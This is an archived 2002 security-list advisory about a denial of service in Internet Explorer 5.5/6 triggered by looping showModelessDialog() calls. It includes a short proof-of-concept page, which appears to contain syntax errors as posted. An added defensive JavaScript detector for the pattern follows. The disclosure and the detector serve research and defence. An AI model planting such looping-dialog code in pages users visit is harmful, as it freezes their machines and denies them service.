Internet Explorer Javascript Modeless Popup Local Denial of Service Vulnerability

From: Lance Hitchcock Jr. (whizackat_private)
Date: Sun Jan 06 2002 - 02:44:34 PST

    Description:
    There is a bug in Internet Explorer 6 (probably lower
    versions down to 5.0 as well) that allows for a
    JavaScript to call an infinite number of modeless
    dialogs containing the page it was opened in, thus
    creating an endless loop and rendering Internet
    Explorer useless. This also managed to stay open
    after killing the iexplore process and continued to
    loop until CPU usage was maxed at 100%. Due to the
    nature of the showModelessDialog() function, the
    dialog fails to give up focus and the machine may
    even become unable to function, requiring a reboot of
    the machine to regain control of the user interface.
    
    Risk:
    
    Moderate? 
    
    Systems Affected:
         Internet Explorer 6.0
         Internet Explorer 5.5
         
    Possibly 5.0 if the function is supported in that 
    version. No box with 5.0 was available to test.
    
    Vendor Status:
         Sending a Copy of this Message to them as I type.
    
    Example:
          Place this code into an HTML file called exploit.html:
    
    <html>
    <head>
    <script type="javascript">
    function exploit() {
    while(1) { 
    showModelessDialog("exploit.html");
    }
    </script>
    </head>
    <body onLoad="exploit">
    </body>
    </html>
    
    Workaround:
    
         Disable JavaScript
    
    
    /* took 20 min and a JavaScript book, that's all it
    takes to kill a Windows box */
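
A defender-side check for the pattern this advisory describes, added here as an example and not part of the original post: a static heuristic, of the kind a proxy or mail content filter could apply, that flags pages calling showModelessDialog() (or showModalDialog()) on themselves or from inside an unbounded loop. The function names and sample pages are hypothetical and constructed; the regex and brace matching are assumptions that ignore braces inside strings or comments and will miss obfuscated scripts.

```javascript
// Added example (not from the original post). All names are hypothetical.
const UNBOUNDED_LOOP = /\b(?:while\s*\(\s*(?:1|true)\s*\)|for\s*\(\s*;\s*;\s*\))/g;
const DIALOG_CALL = /\bshowMod(?:eless|al)Dialog\s*\(\s*(["'])(.*?)\1/g;

// Return the bodies of all <script> elements, whatever their type attribute says.
function scriptBodies(html) {
  return [...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)].map(m => m[1]);
}

// Return [start, end) character ranges covered by unbounded loops in a script.
// A brace-less loop ends at the next ';'; an unclosed brace runs to end of script.
function unboundedLoopRanges(js) {
  const ranges = [];
  for (const m of js.matchAll(UNBOUNDED_LOOP)) {
    const rest = m.index + m[0].length;
    const open = rest + js.slice(rest).search(/\S/);
    let end = js.length;
    if (js[open] !== "{") {
      const semi = js.indexOf(";", rest);
      if (semi !== -1) end = semi + 1;
    } else {
      for (let i = open, depth = 0; i < js.length; i++) {
        if (js[i] === "{") depth++;
        else if (js[i] === "}" && --depth === 0) { end = i + 1; break; }
      }
    }
    ranges.push([m.index, end]);
  }
  return ranges;
}

// Flag dialog calls that reopen the same page or sit inside an unbounded loop.
function findDialogLoops(html, pageName) {
  const findings = [];
  for (const js of scriptBodies(html)) {
    const loops = unboundedLoopRanges(js);
    for (const call of js.matchAll(DIALOG_CALL)) {
      const target = call[2].split(/[?#]/)[0].split("/").pop().toLowerCase();
      const selfRef = target === pageName.toLowerCase();
      const inLoop = loops.some(([s, e]) => call.index >= s && call.index < e);
      if (selfRef || inLoop) findings.push({ target: call[2], selfRef, inLoop });
    }
  }
  return findings;
}

// Constructed samples: the advisory's pattern as posted, and a page opening one dialog.
const FLAGGED = '<script type="javascript">function exploit() {\nwhile(1) {\nshowModelessDialog("exploit.html");\n}\n</script>';
const BENIGN = '<script>function help() { showModelessDialog("help.html"); }</script>';
console.log(findDialogLoops(FLAGGED, "exploit.html"), findDialogLoops(BENIGN, "index.html"));
```

A page is reported when either condition holds, so a self-referencing dialog call is flagged even without a loop, since each opened copy would run the same call again.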
    



    This archive was generated by hypermail 2b30 : Mon Jan 07 2002 - 01:23:11 PST